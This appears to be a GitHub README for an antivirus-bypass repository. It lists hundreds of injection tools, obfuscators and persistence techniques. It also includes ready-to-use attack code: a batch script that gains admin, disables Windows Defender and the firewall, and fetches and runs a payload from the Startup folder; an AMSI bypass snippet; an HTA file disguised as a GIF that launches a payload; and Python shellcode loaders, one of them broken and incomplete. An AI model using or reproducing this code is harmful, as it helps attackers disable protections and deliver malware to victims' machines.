Skip to content

Ondrik8/byPass_AV

BranchesTags

Repository files navigation

image

NSGenCS(https://shells.systems/the-birth-of-nsgencs/)

Injection

  • PE Injection、DLL Injection、Process Injection、Thread Injection、Code Injection、Shellcode Injection、ELF Injection、Dylib Injection, including 400+Tools and 350+posts

Directory

PE Injection

Tools

Post

DLL Injection

Collection

Tools

  • [1121Star][7y] [C] stephenfewer/reflectivedllinjection Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
  • [1093Star][11d] [C] fdiskyou/injectallthethings Seven different DLL injection techniques in one single project.
  • [747Star][10m] [C++] darthton/xenos Windows dll injector
  • [635Star][7m] [PS] monoxgas/srdi Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode
  • [489Star][4m] [C#] akaion/bleak A Windows native DLL injection library that supports several methods of injection.
  • [385Star][14d] [C++] opensecurityresearch/dllinjector dll injection tool that implements various methods
  • [382Star][13d] [C] wbenny/injdrv proof-of-concept Windows Driver for injecting DLL into user-mode processes using APC
  • [277Star][2y] [C++] gellin/teamviewer_permissions_hook_v1 A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions.
  • [268Star][3y] [C++] professor-plum/reflective-driver-loader injection technique base off Reflective DLL injection
  • [227Star][10d] [C++] wunkolo/uwpdumper DLL and Injector for dumping UWP applications at run-time to bypass encrypted file system protection.
  • [197Star][2y] [C] sud01oo/processinjection Some ways to inject a DLL into a alive process
  • [190Star][10d] [C++] hzphreak/vminjector DLL Injection tool to unlock guest VMs
  • [185Star][19d] [C++] jonatan1024/clrinject 将 C#EXE 或 DLL 程序集注入任意CLR 运行时或者其他进程的 AppDomain
  • [178Star][1m] [Py] infodox/python-dll-injection Python toolkit for injecting DLL files into running processes on Windows
  • [177Star][11m] [C++] strivexjun/driverinjectdll Using Driver Global Injection dll, it can hide DLL modules
  • [146Star][4y] [C] dismantl/improvedreflectivedllinjection An improvement of the original reflective DLL injection technique by Stephen Fewer of Harmony Security
  • [113Star][2m] [C] rsmusllp/syringe A General Purpose DLL & Code Injection Utility
  • [110Star][7y] [C++] abhisek/pe-loader-sample Proof of concept implementation of in-memory PE Loader based on ReflectiveDLLInjection Technique
  • [87Star][2m] [C] countercept/doublepulsar-usermode-injector A utility to use the usermode shellcode from the DOUBLEPULSAR payload to reflectively load an arbitrary DLL into another process, for use in testing detection techniques or other security research.
  • [86Star][3y] [C] zerosum0x0/threadcontinue Reflective DLL injection using SetThreadContext() and NtContinue()
  • [82Star][6m] [C++] nefarius/injector Command line utility to inject and eject DLLs
  • [73Star][4m] [C] danielkrupinski/memject Simple Dll injector loading from memory. Supports PE header and entry point erasure. Written in C99.
  • [62Star][15d] [Py] psychomario/pyinject A python module to help inject shellcode/DLLs into windows processes
  • [61Star][3y] [C] arvanaghi/windows-dll-injector A basic Windows DLL injector in C using CreateRemoteThread and LoadLibrary. Implemented for educational purposes.
  • [59Star][3y] [C++] azerg/remote_dll_injector Stealth DLL injector
  • [56Star][1y] [C] rapid7/reflectivedllinjection Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
  • [53Star][5m] [C] adrianyy/keinject Kernel LdrLoadDll injector
  • [52Star][5m] [C] nccgroup/ncloader A session-0 capable dll injection utility
  • [52Star][3y] [C++] zer0mem0ry/standardinjection A simple Dll Injection demonstration
  • [51Star][19d] [C++] papadp/reflective-injection-detection a program to detect reflective dll injection on a live machine
  • [50Star][1y] [C] realoriginal/reflective-rewrite Attempt to rewrite StephenFewers Reflective DLL Injection to make it a little more stealthy. Some code taken from Meterpreter & sRDI. Currently a work in progress.
  • [49Star][3y] [C++] zodiacon/dllinjectionwiththreadcontext This is a sample that shows how to leverage SetThreadContext for DLL injection
  • [42Star][3y] [C++] zer0mem0ry/manualmap A Simple demonstration of manual dll injector
  • [38Star][26d] [C++] rolfrolles/wbdeshook DLL-injection based solution to Brecht Wyseur's wbDES challenge (based on SysK's Phrack article)
  • [38Star][2m] [Assembly] danielkrupinski/inflame User-mode Windows DLL injector written in Assembly language (FASM syntax) with WinAPI.
  • [37Star][4m] [C++] nanoric/pkn core of pkn game hacking project. Including mainly for process management, memory management, and DLL injecttion. Also PE analysis, windows registry management, compile-time sting encryption, byte-code emulator, etc. Most of them can run under kernel mode.
  • [36Star][7m] [C++] blole/injectory command-line interface dll injector
  • [33Star][3m] [C++] notscimmy/libinject Currently supports injecting signed/unsigned DLLs in 64-bit processes
  • [31Star][4m] [Py] fullshade/poppopret-nullbyte-dll-bypass A method to bypass a null byte in a POP-POP-RETN address for exploiting local SEH overflows via DLL injection
  • [30Star][6m] [C++] psmitty7373/eif Evil Reflective DLL Injection Finder
  • [29Star][4m] [C++] m-r-j-o-h-n/swh-injector An Injector that can inject dll into game process protected by anti cheat using SetWindowsHookEx.
  • [29Star][4y] [C++] stormshield/beholder-win32 A sample on how to inject a DLL from a kernel driver
  • [28Star][4m] [Py] fullshade/py-memject A Windows .DLL injector written in Python
  • [27Star][6m] [HTML] flyrabbit/winproject Hook, DLLInject, PE_Tool
  • [27Star][4m] [C] ice3man543/zeusinjector An Open Source Windows DLL Injector With All Known Techniques Available
  • [27Star][5y] [C] olsut/kinject-x64 Kinject - kernel dll injector, currently available in x86 version, will be updated to x64 soon.
  • [27Star][5m] [C] sqdwr/loadimageinject LoadImage Routine Inject Dll
  • [25Star][1y] [C#] enkomio/managedinjector A C# DLL injection library
  • [25Star][6y] [C] whyallyn/paythepony Pay the Pony is hilarityware that uses the Reflective DLL injection library to inject into a remote process, encrypt and demand a ransom for files, and inflict My Little Pony madness on a system.
  • [24Star][2m] [C#] tmthrgd/dll-injector Inject and detour DLLs and program functions both managed and unmanaged in other programs, written (almost) purely in C#. [Not maintained].
  • [21Star][3y] [C] al-homedawy/injector A Windows driver used to facilitate DLL injection
  • [21Star][5y] [C] nyx0/dll-inj3cti0n Another dll injection tool.
  • [21Star][29d] [C++] coreyauger/slimhook Demonstration of dll injection. As well loading .net runtime and calling .net code. Example hijacking d3d9 dll and altering rendering of games.
  • [17Star][12m] [C] strobejb/injdll DLL Injection commandline utility
  • [17Star][5m] [C#] cameronaavik/ilject Provides a way which you can load a .NET dll/exe from disk, modify/inject IL, and then run the assembly all in memory without modifying the file.
  • [15Star][2y] [C] ntraiseharderror/phage Reflective DLL Injection style process infector
  • [15Star][3y] [C] portcullislabs/wxpolicyenforcer Injectable Windows DLL which enforces a W^X memory policy on a process
  • [14Star][4m] [C#] ulysseswu/vinjex A simple DLL injection lib using Easyhook, inspired by VInj.
  • [13Star][1y] [C++] matrix86/wincodeinjection Dll Injection and Code injection sample
  • [13Star][4y] [C++] spl0i7/dllinject Mineweeper bot by DLL Injection
  • [12Star][4m] [C++] sherazibrahim/dll-injector I created a dll injector I am going to Open source its Code. But remember one thing that is any one can use it only for Educational purpose .I again say do not use it to damage anyone's Computer.But one thing if you are using it for some good purpose like to help someone who really need help then I permit you to use it.
  • [11Star][9m] [C#] ihack4falafel/dll-injection C# program that takes process id and path to DLL payload to perform DLL injection method.
  • [9Star][18d] [C++] pfussell/pivotal A MITM proxy server for reflective DLL injection through WinINet
  • [9Star][9m] [C] userexistserror/injectdll Inject a Dll from memory
  • [9Star][1y] [Assembly] dentrax/dll-injection-with-assembly DLL Injection to Exe with Assembly using OllyDbg
  • [7Star][1y] [C] haidragon/newinjectdrv APC注入DLL内核层
  • [6Star][2y] thesph1nx/covenant Metepreter clone - DLL Injection Backdoor
  • [5Star][5y] [C++] ciantic/remotethreader Helps you to inject your dll in another process
  • [5Star][4m] [C++] reclassnet/reclass.net-memorypipeplugin A ReClass.NET plugin which allows direct memory access via dll injection.
  • [1Star][1y] [PS] getrektboy724/maldll A bunch of malicius dll to inject to a process

Post

Process Injection

Tools

Post

Thread Injection

Tools

Post

Code Injection

Tools

  • [6260Star][10d] [ObjC] johnno1962/injectionforxcode Runtime Code Injection for Objective-C & Swift
  • [2386Star][2y] [Py] danmcinerney/lans.py Inject code and spy on wifi users
  • [1685Star][11d] [Py] epinna/tplmap Server-Side Template Injection and Code Injection Detection and Exploitation Tool
  • [1470Star][4m] [Swift] johnno1962/injectioniii Re-write of Injection for Xcode in (mostly) Swift4
  • [1112Star][14d] [ObjC] dyci/dyci-main Dynamic Code Injection Tool for Objective-C
  • [983Star][3y] [C] cybellum/doubleagent Zero-Day Code Injection and Persistence Technique
  • [614Star][16d] [C++] breakingmalwareresearch/atom-bombing Brand New Code Injection for Windows
  • [265Star][5y] [C++] breakingmalware/powerloaderex Advanced Code Injection Technique for x32 / x64
  • [249Star][8y] rentzsch/mach_star code injection and function overriding for Mac OS X
  • [228Star][12d] [C++] marcosd4h/memhunter Live hunting of code injection techniques
  • [214Star][17d] [C] peperunas/injectopi A set of tutorials about code injection for Windows.
  • [186Star][7m] [ObjC] nakiostudio/twitterx Keeping Twitter for macOS alive with code injection
  • [170Star][2y] [Py] undeadsec/debinject Inject malicious code into *.debs
  • [116Star][22d] [C#] p0cl4bs/hanzoinjection injecting arbitrary codes in memory to bypass common antivirus solutions
  • [91Star][2m] [Py] hackatnow/cromos Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application.
  • [90Star][4y] [Java] zerothoughts/spring-jndi Proof of concept exploit, showing how to do bytecode injection through untrusted deserialization with Spring Framework 4.2.4
  • [66Star][2y] [Java] sola-da/synode Automatically Preventing Code Injection Attacks on Node.js
  • [65Star][3y] [Py] sethsec/pycodeinjection Automated Python Code Injection Tool
  • [65Star][3m] [Py] tbarabosch/quincy 在内存转储中检测基于主机的代码注入攻击
  • [49Star][2m] [C#] guibacellar/dnci DNCI - Dot Net Code Injector
  • [48Star][3y] [C++] tonyzesto/pubgprivxcode85 Player ESP 3D Box ESP Nametag ESP Lightweight Code Secure Injection Dedicated Cheat Launcher Secured Against Battleye Chicken Dinner Every Day. Win more matches than ever before with CheatAutomation’s Playerunknown’s Battlegrounds cheat! Our stripped down, ESP only cheat gives you the key features you need to take out your opponents and be eatin…
  • [47Star][1y] [C] yifanlu/3ds_injector Open source implementation of loader module with code injection support
  • [46Star][7m] [C] rodionovd/task_vaccine Yet another code injection library for OS X
  • [37Star][2m] [C] sduverger/ld-shatner ld-linux code injector
  • [34Star][2y] [C++] ntraiseharderror/dreadnought PoC for detecting and dumping code injection (built and extended on UnRunPE)
  • [27Star][4y] [Java] zerothoughts/jndipoc Proof of concept showing how java byte code can be injected through InitialContext.lookup() calls
  • [27Star][6m] [Java] dinject/dinject Dependency injection via APT (source code generation) ala "Server side Dagger DI"
  • [25Star][7m] [Py] batteryshark/miasma Cross-Platform Binary OTF Patcher, Code Injector, Hacking Utility
  • [25Star][3y] [C++] hatriot/delayloadinject Code injection via delay load libraries
  • [20Star][2y] [c] odzhan/propagate PROPagate code injection technique example
  • [19Star][3y] [Swift] depoon/injectiblelocationspoofing Location Spoofing codes for iOS Apps via Code Injection
  • [18Star][6y] [ObjC] mhenr18/injector Code injection + payload communications for OSX (incl. sandboxed apps)
  • [17Star][2m] [C++] sunsided/native-dotnet-code-injection Injection of managed code into non-managed Windows applications
  • [14Star][2m] [C#] gerich-home/lua-inject Inject any C# code into programs with lua
  • [13Star][3y] [C] tbarabosch/1001-injects Tiny research project to understand code injections on Linux based systems
  • [13Star][3m] [C++] revsic/codeinjection Code Injection technique written in cpp language
  • [11Star][2y] [C] gdbinit/calcspace Small util to calculate available free space in mach-o binaries for code injection
  • [11Star][7y] [C#] yifanlu/vitainjector Inject userland ARM code through PSM
  • [9Star][19d] [Py] bao7uo/waf-cookie-fetcher WAF Cookie Fetcher is a Burp Suite extension written in Python, which uses a headless browser to obtain the values of WAF-injected cookies which are calculated in the browser by client-side JavaScript code and adds them to Burp's cookie jar. Requires PhantomJS.
  • [9Star][6m] [Py] mpgn/cve-2018-16341 CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
  • [7Star][2y] [PHP] jpapayan/aspis A PHP code transformer to provide protection against injection attacks
  • [6Star][2y] [Py] andreafortuna/pycodeinjector Python code injection library
  • [4Star][1y] [Java] righettod/injection-cheat-sheets Provide some tips to handle Injection into application code (OWASP TOP 10 - A1).
  • [2Star][2y] [Standard ML] 11digits/php-clean-malware Simple PHP code to assist in cleaning of injected malware PHP code
  • [2Star][9m] [C++] thepwnrip/code-injection A collection of methods of Code Injection on Windows
  • [1Star][1y] [C++] smore007/remote-iat-hook Remote IAT hook example. Useful for code injection
  • [NoneStar][Py] thelinuxchoice/eviloffice Inject Macro and DDE code into Excel and Word documents (reverse shell)

Post

Shellcode Injection

Tools

  • [2209Star][4m] [Py] trustedsec/unicorn Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
  • [476Star][21d] [Py] trustedsec/meterssh a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection.
  • [225Star][4m] [PS] outflanknl/excel4-dcom PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)
  • [112Star][2m] [C++] josh0xa/threadboat uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
  • [77Star][4m] [C] dimopouloselias/simpleshellcodeinjector receives as an argument a shellcode in hex and executes it
  • [66Star][2m] [Py] sensepost/anapickle Toolset for writing shellcode in Python's Pickle language and for manipulating pickles to inject shellcode.
  • [43Star][1m] [Py] borjamerino/tlsinjector Python script to inject and run shellcodes through TLS callbacks
  • [27Star][2y] [Py] taroballzchen/shecodject shecodject is a autoscript for shellcode injection by Python3 programing
  • [19Star][5y] [C] jorik041/cymothoa Cymothoa is a backdooring tool, that inject backdoor's shellcode directly into running applications. Stealth and lightweight...
  • [16Star][9m] [PLpgSQL] michaelburge/redshift-shellcode Example of injecting x64 shellcode into Amazon Redshift
  • [10Star][1y] [C++] egebalci/injector Simple shellcode injector.
  • [4Star][3y] [Shell] thepisode/linux-shellcode-generator Experiments on Linux Assembly shellcodes injection
  • [NoneStar][Go] pioneerhfy/goback GOback is a backdoor written in GO that use shellcode injection technique for achiving its task.

Post

ELF Injection

Tools

  • [269Star][10d] [Shell] cytopia/pwncat pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
  • [106Star][14d] [C] comsecuris/luaqemu QEMU-based framework exposing several of QEMU-internal APIs to a LuaJIT core injected into QEMU itself. Among other things, this allows fast prototyping of target systems without any native code and minimal effort in Lua.
  • [73Star][10d] [C] zznop/drow Injects code into ELF executables post-build
  • [45Star][1m] [C] jmpews/evilelf Malicious use of ELF such as .so inject, func hook and so on.
  • [26Star][4m] [C++] shaxzy/nixware-csgo Source code of Nixware. Cheat doesn't inject for some reason, fix it uself or just paste from it
  • [9Star][3m] [C] mfaerevaag/elfinjector Code injector for ELF binaries (incl. PIE)
  • [1Star][2y] [JS] mshoop/web-xss-attack Exploring website security through cross-site scripting attacks, maliciously injected JavaScript and self-propagating worms

Post

Dylib Injection

Tools

  • [2032Star][3y] [Swift] urinx/iosapphook 专注于非越狱环境下iOS应用逆向研究,从dylib注入,应用重签名到App Hook
  • [752Star][5y] [ObjC] kjcracks/yololib dylib injector for mach-o binaries
  • [506Star][13d] [Objective-C++] bishopfox/bfinject Dylib injection for iOS 11.0 - 11.1.2 with LiberiOS and Electra jailbreaks
  • [191Star][3m] [Swift] codesourse/iinjection an app for OS X that can inject dylib and (re)sign apps and bundle them into ipa files that are ready to be installed on an iOS device.
  • [173Star][16d] [C] scen/osxinj osx dylib injection

Post

Android

Tools

  • [1300Star][4m] [JS] megatronking/httpcanary A powerful capture and injection tool for the Android platform
  • [475Star][3y] [Smali] sensepost/kwetza Python script to inject existing Android applications with a Meterpreter payload.
  • [447Star][9m] [Java] megatronking/netbare Net packets capture & injection library designed for Android
  • [252Star][16d] [Py] feicong/jni_helper Android SO automatic injection
  • [148Star][4m] [Java] zhouat/inject-hook for android
  • [144Star][3y] [C] xmikos/setools-android Unofficial port of setools to Android with additional sepolicy-inject utility included
  • [136Star][11d] [Lua] lanoox/luject A static injector of dynamic library for application (android, iphoneos, macOS, windows, linux)
  • [122Star][5y] irsl/adb-backup-apk-injection Android ADB backup APK Injection POC
  • [97Star][4y] [Shell] jlrodriguezf/whatspwn Linux tool used to extract sensitive data, inject backdoor or drop remote shells on android devices.
  • [76Star][4y] [Py] moosd/needle Android framework injection made easy
  • [56Star][4m] [C] shunix/tinyinjector Shared Library Injector on Android
  • [55Star][4m] [Java] igio90/fridaandroidinjector Inject frida agents on local processes through an Android app
  • [52Star][2m] [Py] alessandroz/pupy Pupy is an opensource, multi-platform (Windows, Linux, OSX, Android), multi function RAT (Remote Administration Tool) mainly written in python.
  • [52Star][14d] [TS] whid-injector/whid-mobile-connector Android Mobile App for Controlling WHID Injector remotely.
  • [48Star][16d] [Py] ikoz/jdwp-lib-injector inject native shared libraries into debuggable Android applications
  • [46Star][30d] [Shell] jbreed/apkinjector Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.
  • [40Star][8m] [Java] ivianuu/contributer Inject all types like views or a conductor controllers with @ContributesAndroidInjector
  • [33Star][1y] [Groovy] eastwoodyang/autoinject Android 通用的组件自动注册、自动初始化解决方案
  • [30Star][6m] [Java] cristianturetta/mad-spy We developed a malware for educational purposes. In particular, our goal is to provide a PoC of what is known as a Repacking attack, a known technique widely used by malware cybercrooks to trojanize android apps. The answer to solve this particular goal boils down in the simplicity of APK decompiling and smali code injection.
  • [24Star][5m] [Smali] aress31/sci Framework designed to automate the process of assembly code injection (trojanising) within Android applications.
  • [13Star][11m] [JS] cheverebe/android-malware Injected malicious code into legitimate andoid applications. Converted a keyboard app into a keylogger and an MP3 downloader into an image thief.

Post

Other

Tools

Engineering antivirus evasion(https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/)

Obfuscation

https://github.com/xoreaxeaxeax/movfuscator

https://github.com/danielbohannon/Invoke-DOSfuscation

https://github.com/unixpickle/gobfuscate - GO Obfuscator

https://github.com/NotPrab/.NET-Obfuscator - Lists of .NET Obfuscator (Free, Trial, Paid and Open Source )

https://github.com/javascript-obfuscator/javascript-obfuscator - Javascript Obfuscator

https://github.com/danielbohannon/Invoke-Obfuscation - Powershell Obfuscator

https://github.com/BinaryScary/NET-Obfuscate - .NET IL Obfuscator

https://github.com/scrt/avcleaner - C/C++ source obfuscator for antivirus bypass

https://github.com/meme/hellscape - GIMPLE obfuscator for C, C++, Go, ... all supported GCC targets and front-ends that use GIMPLE.

https://github.com/mgeeky/VisualBasicObfuscator - VBS Obfuscator

https://github.com/3xpl01tc0d3r/Obfuscator - Shellcode Obfuscator

https://github.com/EgeBalci/sgn - Shellcode Encoder

image

https://github.com/lengjibo/FourEye

https://github.com/swagkarna/Defeat-Defender

@echo off
:: BatchGotAdmin
::-------------------------------------
REM  --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"="
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"

takeown /f "%systemroot%\System32\smartscreen.exe" /a
icacls "%systemroot%\System32\smartscreen.exe" /reset
taskkill /im smartscreen.exe /f


powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

powershell.exe -command "Set-MpPreference -PUAProtection disable"

powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"

powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"

powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"

powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"

powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

powershell.exe -command "Set-MpPreference -MAPSReporting 0"
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
      
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

powershell.exe -command "netsh advfirewall set allprofiles state off"

cd  %temp%
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe', '.\NSudo.exe') }
 
NSudo.exe -U:T -ShowWindowMode:Hide sc stop WinDefend 

cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://direct-url/foryour-payload', '.\payload.exe') }
start payload.exe

shellcode_obfuscator

SHELLcode

https://github.com/Gr1mmie/SharpShellCodeObfus
https://github.com/ChoiSG/UuidShellcodeExec
https://github.com/alphaSeclab/shellcode-resources

PS(https://github.com/specterops/at-ps/blob/master/Adversary%20Tactics%20-%20PowerShell.pdf)

PowerShell тактики уклонения

[DLL_reflect]

https://github.com/stephenfewer/ReflectiveDLLInjection
https://github.com/DarthTon/Blackbone Swiss army knife
https://github.com/dismantl/ImprovedReflectiveDLLInjection this one is very very cool
https://github.com/Professor-plum/Reflective-Driver-Loader very cool as well
https://github.com/countercept/doublepulsar-usermode-injector
https://github.com/azerton/dll_inject_test
https://github.com/ru-faraon/pupy
https://github.com/floomby/injector
https://github.com/amishsecurity/paythepony
https://github.com/BorjaMerino/Pazuzu
https://github.com/Frenda/libScanHook/blob/master/libScanHook/PeLoader.cpp
https://github.com/apriorit/ReflectiveDLLInjection
https://github.com/uItra/Injectora
https://github.com/fancycode/MemoryModule
https://github.com/mq1n/SonicInjector

Various tools:
https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher
https://github.com/CylanceVulnResearch/upx/tree/reflective_dll
https://github.com/papadp/reflective-injection-detection
https://github.com/xorrior/WebCam_Dll
https://github.com/psmitty7373/eif
https://github.com/azerton/dll_inject_test
https://github.com/hirnschallsebastian/Breach
https://wikileaks.org/ciav7p1/cms/page_14588718.html
https://github.com/jaredhaight/ReflectCmd
https://www.codeproject.com/Articles/44326/MinHook-The-Minimalistic-x-x-API-Hooking-Libra
https://github.com/Jyang772/XOR_Crypter/tree/master/Stub
https://github.com/thereals0beit/RemoteFunctions

Documentation, blog posts and videos:
https://www.endgame.com/blog/technical-blog/hunting-memory
https://en.wikipedia.org/wiki/Portable_Executable
https://upload.wikimedia.org/wikipedia/commons/1/1b/Portable_Executable_32_bit_Structure_in_SVG_fixed.svg
http://stackoverflow.com/questions/18362368/loading-dlls-at-runtime-in-c-sharp
https://www.countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/
https://www.countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/
https://zerosum0x0.blogspot.dk/2017/04/doublepulsar-initial-smb-backdoor-ring.html
https://www.codeproject.com/Articles/20084/A-More-Complete-DLL-Injection-Solution-Using-Creat
http://blog.harmonysecurity.com/2008/10/new-paper-reflective-dll-injection.html
http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html
https://disman.tl/2015/03/16/cross-architecture-reflective-dll-inection.html
https://www.youtube.com/watch?v=9U6dtRtSuFo&index=11&list=PLcTmaBQIhUkgvwz3k-JGHUcDlS41fim0x
https://www.youtube.com/watch?v=9L9I1T5QDg

Interesting Microsoft documentation:
https://blogs.msdn.microsoft.com/ntdebugging/2009/01/09/challenges-of-debugging-optimized-x64-code/
https://msdn.microsoft.com/en-us/library/4khtbfyf
https://msdn.microsoft.com/en-us/library/69ze775t.aspx

PE2HTML

IPObfuscator

All Resource Collection Obfuscators

amsybypass

$a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') 
$h="4456625220575263174452554847" 
$s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " " 
$b =$a.GetField($s,'NonPublic,Static') 
$b.SetValue($null,$true)

java obfuscator (GUI)

java obfuscator

https://github.com/Ekultek/Graffiti

graffitibanner

https://www.youtube.com/watch?v=xNhQMwC0BLo&feature=emb_logo

https://github.com/Ekultek/Graffiti

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Powershell_Fernet_Obfuscator

https://github.com/TheEyeOfCyber/FernHunt_WindowsPowershell-Obfuscator

SOURCE

Persistence techniques

Code Technique Mitre
PE-001 Winlogon Helper DLL T1004
PE-002 Port Monitors T1013
PE-003 Accessibility Features T1015
PE-004 Shortcut Modification T1023
PE-005 Modify Existing Service T1031
PE-006 DLL Search Order Hijacking T1038
PE-007 Change Default File Association T1042
PE-008 New Service T1050
PE-009 Scheduled Tasks T1053
PE-010 Service Registry Permission Weakness T1058
PE-011 Registry Run Keys T1060
PE-012 WMI Event Subscription T1084
PE-013 Security Support Provider T1101
PE-014 AppInit DLLs T1103
PE-015 Component Object Model Hijacking T1122
PE-016 Netsh Helper DLL T1128
PE-017 Office Application Startup T1137
PE-018 Application Shimming T1138
PE-019 Screensaver T1180
PE-020 Image File Execution Options Injection T1183
PE-021 BITS Jobs T1197
PE-022 Time Providers T1209
PE-023 PowerShell Profile T1504
PE-024 Waitfor N/A
PE-025 RID Hijacking N/A

Blogs

Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge

https://jhalon.github.io/utilizing-syscalls-in-csharp-1/

Tools

Stealing Signatures ПОДПИСЬ

B2E

EVIL GIF

<html>
<head>
<title>NazvanieGif</title>
<hta:application id="NazvanieGif"
border="thin"
borderstyle="complex"
maximizeButton="no"
minimizeButton="no"
/>
</head>
<script type="text/javascript">
var index = -1;
var images = [
"data:image/gif;base64,                                             "];
function initGallery(){
window.resizeTo(300,300);
htaPayload();
nextPicture();
}
function nextPicture(){
var img;
index = index + 1;
if (index > images.length -1 ){
index = 0;
}
img = document.getElementById("gallery");
img.src = images[index];
}
function htaPayload(){
var payload="calc.exe";
try{
if (navigator.userAgent.indexOf("Windows") !== -1){
new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
}
}
catch(e){
}
}
</script>
<style>
#gallery, div {
width: 100%;
height: 100%;
}
#outer {
text-align: center;
}
#inner{
display: inline-block;
}
body {
background-color: black;
}
</style>
<body onload="initGallery()">
<div id="outer">
<div id="inner">
<img id="gallery" onclick="nextPicture()">
</div>
</div>
</body>
</html>

Non-interactive Installation PYTHON

msiexec /i python<version>.msi

https://www.python.org/download/releases/2.5/msi/

c# Simple-Loader

# python2
import ctypes

payload = ""
shellcode = bytearray(payload)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
import ctypes

shellcode =  ""
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
import ctypes

buf =  ""
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr: 
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       if 1:
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              ctypes.windll.kernel32.CloseHandle(whnd)
